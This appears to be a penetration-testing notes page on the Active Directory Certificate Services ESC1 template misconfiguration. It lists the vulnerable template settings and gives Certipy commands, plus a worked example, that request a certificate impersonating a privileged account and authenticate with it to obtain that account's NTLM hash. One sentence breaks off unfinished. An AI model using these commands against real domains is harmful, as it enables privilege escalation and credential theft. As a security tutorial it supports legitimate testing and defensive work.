ESC1

TL;DR

ESC1 lets you request the certificate as any elevated domain account by requesting a certificate as any user on the domain and use that certificate for client authentication using Kerberos.

A template is vulnerable to ESC1 when a certificate template allows for Client Authentication and allows the account enrolling in the certificate to supply an arbitrary Subject Alternative Name (SAN).

A certificate template with the following configuration is vulnerable to ESC1:

  • The Enterprise CA grants low-privileged users enrollment rights (commonly 'Authenticated Users').

  • Manager approval is disabled.

  • No authorized signatures are required.

  • An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users.

Exploit

LogoGitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

Start by requesting a certificate using any controlled domain account with the -upn flag specifying any enabled privileged account. This command should output a .pfx file.

Linux (Attacker)
certipy req -username [username]@[domain] -password [password] -ca [CA CN] -target [CA FQDN] -template [vuln template] -upn [target account]@[domain]

Use the .pfx file to authenticate to the domain controller using Kerberos, allowing you to obtain the NTLM hash for the privileged account.

Linux (Attacker)
certipy auth -pfx [.pfx from above] -dc-ip [DC IP]

The NTLM hash is stored within

Example

Linux (Attacker)
certipy req -username [email protected] -password password123 -ca weelee-DC-CA -target ca.weelee.zip -template VulnTemplate -upn [email protected] -dns dc.weelee.zip

certipy auth -pfx Administrator.pfx -dc-ip 10.10.10.10
PreviousAD CS/Template DiscoveryNextESC2

Last updated